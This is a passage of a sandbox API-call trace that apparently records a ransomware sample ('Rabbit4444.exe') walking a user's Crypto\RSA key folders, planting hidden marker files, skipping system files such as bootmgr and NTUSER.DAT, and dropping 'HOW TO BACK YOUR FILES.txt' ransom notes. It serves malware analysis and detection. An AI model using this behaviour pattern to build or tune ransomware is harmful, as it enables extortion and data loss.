dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.316] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.318] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.318] CloseHandle (hObject=0x278) returned 1 [0053.318] CloseHandle (hObject=0x27c) returned 1 [0053.318] GetCurrentThreadId () returned 0xd98 [0053.318] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0053.318] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" [0053.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065f0 | out: hHeap=0xe0000) returned 1 [0053.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0053.318] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" [0053.318] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\" [0053.318] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3" [0053.318] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.319] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.321] FlushFileBuffers (hFile=0x27c) returned 1 [0053.322] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.323] CloseHandle (hObject=0x27c) returned 1 [0053.323] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned 48 [0053.323] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe91aa858, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0053.323] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.323] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.323] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.323] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.323] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe91aa858, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.323] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.323] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.323] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.323] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.324] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.324] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe91aa858, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe91aa858, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe91aa858, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.324] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.324] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.324] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="Rabbit4444.exe") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="windows") returned -1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="bootmgr") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="pagefile.sys") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="boot") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="ids.txt") returned 1 [0053.324] lstrcmpiW (lpString1="RSA", lpString2="NTUSER.DAT") returned 1 [0053.324] lstrcpyW (in: lpString1=0x130eb9a, lpString2="RSA" | out: lpString1="RSA") returned="RSA" [0053.324] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", dwFileAttributes=0x10) returned 1 [0053.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0053.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x1176f8 [0053.324] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63f0 [0053.324] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0053.324] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0053.324] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.325] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.325] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.326] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.326] CloseHandle (hObject=0x278) returned 1 [0053.326] CloseHandle (hObject=0x27c) returned 1 [0053.326] GetCurrentThreadId () returned 0xd98 [0053.326] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0053.326] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0053.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0053.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0053.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0053.326] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0053.326] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3" [0053.326] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.327] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.329] FlushFileBuffers (hFile=0x27c) returned 1 [0053.330] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.330] CloseHandle (hObject=0x27c) returned 1 [0053.331] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 52 [0053.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.331] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe91aa858, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.331] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.331] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.331] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.331] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe91aa858, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.331] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.331] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.331] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.331] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe91aa858, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe91aa858, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe91d0831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.331] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.331] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.331] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0053.331] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.331] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="Rabbit4444.exe") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="..") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="windows") returned -1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="bootmgr") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="pagefile.sys") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="boot") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="ids.txt") returned 1 [0053.332] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="NTUSER.DAT") returned 1 [0053.332] lstrcpyW (in: lpString1=0x130eba2, lpString2="S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="S-1-5-21-1051304884-625712362-2192934891-1000") returned="S-1-5-21-1051304884-625712362-2192934891-1000" [0053.332] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", dwFileAttributes=0x10) returned 1 [0053.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0053.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116040 [0053.332] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63f0 [0053.332] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0053.332] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.332] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.334] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.334] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.334] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.335] CloseHandle (hObject=0x278) returned 1 [0053.335] CloseHandle (hObject=0x27c) returned 1 [0053.335] GetCurrentThreadId () returned 0xd98 [0053.335] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0053.335] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" [0053.335] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116040 | out: hHeap=0xe0000) returned 1 [0053.335] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0053.335] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" [0053.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0053.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" [0053.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.337] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.340] FlushFileBuffers (hFile=0x27c) returned 1 [0053.341] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.341] CloseHandle (hObject=0x27c) returned 1 [0053.341] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 98 [0053.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe91d0831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0053.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.342] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.342] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.342] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe91d0831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.342] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.342] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.342] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.342] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe91d0831, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe91d0831, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe91d0831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.342] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x7223c64d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x7223c64d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="83AA4C~1")) returned 1 [0053.342] lstrcmpiW 